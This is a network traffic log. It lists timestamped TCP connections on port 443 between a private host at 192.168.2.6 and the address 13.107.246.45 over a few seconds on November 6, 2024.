Nov 6, 2024 17:03:44.904386044 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.940732002 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.941585064 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.941606045 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:44.942060947 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:44.942069054 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.014830112 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.018285990 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.018313885 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.018743992 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.018748045 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.071850061 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.072262049 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.072328091 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.072360992 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.072379112 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.072387934 CET	50232	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.072396040 CET	443	50232	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.075009108 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.075048923 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.075114012 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.075244904 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.075258970 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.147217035 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.147309065 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.147378922 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.147564888 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.147587061 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.147603035 CET	50233	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.147608995 CET	443	50233	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.150441885 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.150477886 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.150552034 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.150744915 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.150757074 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.178962946 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.179820061 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.179820061 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.179831028 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.179846048 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.312815905 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.312882900 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.312937975 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.313126087 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.313139915 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.313148975 CET	50234	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.313153982 CET	443	50234	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.316010952 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.316051960 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:45.316140890 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.316304922 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:45.316318035 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.261387110 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.261955976 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.261987925 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.262391090 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.262397051 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.264997959 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.265288115 CET	50236	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.265310049 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.265712023 CET	50236	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.265716076 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.395553112 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.395584106 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.395627975 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.395631075 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.395673990 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.395895958 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.395919085 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.395929098 CET	50235	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.395935059 CET	443	50235	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.398752928 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.398799896 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.398868084 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.399027109 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.399044037 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.401418924 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.401495934 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.401587009 CET	50236	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.401587009 CET	50236	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.401621103 CET	50236	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.401638031 CET	443	50236	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.403583050 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.403614998 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.403682947 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.403851986 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.403862953 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.406666994 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.406683922 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.407094002 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.407109976 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.407495022 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.407501936 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.407582998 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.407593012 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.407932997 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.407938004 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.410614967 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.410890102 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.410903931 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.411274910 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.411278963 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.536864042 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.536967039 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.537113905 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.537271023 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.537292957 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.537302017 CET	50238	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.537309885 CET	443	50238	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.537487984 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.537770033 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.537808895 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.537827969 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.537861109 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.537910938 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.537910938 CET	50237	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.537930965 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.537940025 CET	443	50237	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.540287971 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.540313005 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.540333033 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.540361881 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.540380955 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.540416956 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.540513992 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.540528059 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.540606022 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.540617943 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.543740988 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.543771982 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.543807030 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.543816090 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.543850899 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.543975115 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.543979883 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.543988943 CET	50239	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.543992996 CET	443	50239	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.545826912 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.545877934 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:46.545942068 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.546104908 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:46.546119928 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.128036022 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.128613949 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.128653049 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.129132986 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.129137993 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.161292076 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.161874056 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.161900043 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.162326097 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.162341118 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.259331942 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.259500980 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.259601116 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.259702921 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.259722948 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.259733915 CET	50240	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.259738922 CET	443	50240	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.262713909 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.262753963 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.262839079 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.263045073 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.263057947 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.267323971 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.267700911 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.267726898 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.268141985 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.268146992 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.292474985 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.292936087 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.292962074 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.293358088 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.293364048 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.295032978 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.295121908 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.295171976 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.295274973 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.295289040 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.295299053 CET	50241	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.295304060 CET	443	50241	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.295785904 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.296127081 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.296140909 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.296566010 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.296571016 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.297816038 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.297846079 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.297935963 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.298058987 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.298075914 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.395915031 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.396078110 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.396164894 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.396279097 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.396307945 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.396322012 CET	50244	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.396327972 CET	443	50244	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.399106026 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.399154902 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.399215937 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.399409056 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.399424076 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.433970928 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.434010029 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.434056044 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.434066057 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.434099913 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.434278011 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.434294939 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.434325933 CET	50243	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.434331894 CET	443	50243	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.435249090 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.435323954 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.435374022 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.435501099 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.435527086 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.435544968 CET	50242	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.435554981 CET	443	50242	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.436973095 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.437012911 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.437073946 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.437207937 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.437237024 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.437244892 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.437257051 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:47.437284946 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.437405109 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:47.437416077 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.002310991 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.002912998 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.002944946 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.003561974 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.003571033 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.072428942 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.075154066 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.075189114 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.075692892 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.075700998 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.136830091 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.136934996 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.136984110 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.137118101 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.137140989 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.137152910 CET	50245	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.137167931 CET	443	50245	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.139812946 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.139847040 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.139918089 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.140024900 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.140043020 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.140913963 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.141199112 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.141218901 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.141633034 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.141638994 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.172693968 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.172755003 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.173274994 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.173286915 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.173707962 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.173712969 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.173935890 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.173950911 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.174273968 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.174278975 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.210134983 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.210197926 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.210297108 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.210325003 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.210668087 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.210676908 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.210688114 CET	50246	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.210707903 CET	443	50246	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.213308096 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.213337898 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.213403940 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.213527918 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.213536024 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.272824049 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.272892952 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.273008108 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.273152113 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.273173094 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.273205996 CET	50247	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.273211956 CET	443	50247	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.275695086 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.275739908 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.275829077 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.275969982 CET	50252	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.275975943 CET	443	50252	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.302062988 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.302087069 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.302134037 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.302196026 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.302241087 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.302476883 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.302490950 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.302516937 CET	50249	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.302522898 CET	443	50249	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.303781986 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.303801060 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.303849936 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.303860903 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.303905964 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.303977013 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.303989887 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.303998947 CET	50248	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.304003954 CET	443	50248	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.305483103 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.305526018 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.305607080 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.305728912 CET	50253	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.305743933 CET	443	50253	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.305928946 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.305943012 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.305994987 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.306113958 CET	50254	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.306133032 CET	443	50254	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.877422094 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.878113985 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.878156900 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.878623962 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.878633022 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.949033976 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.949678898 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.949707031 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:48.950156927 CET	50251	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:48.950174093 CET	443	50251	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.009180069 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.009206057 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.009265900 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.009284973 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.009339094 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.009610891 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.009630919 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.009645939 CET	50250	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.009651899 CET	443	50250	13.107.246.45	192.168.2.6
Nov 6, 2024 17:03:49.013012886 CET	50255	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:03:49.013055086 CET	443	50255	13.107.246.45	192.168.2.6
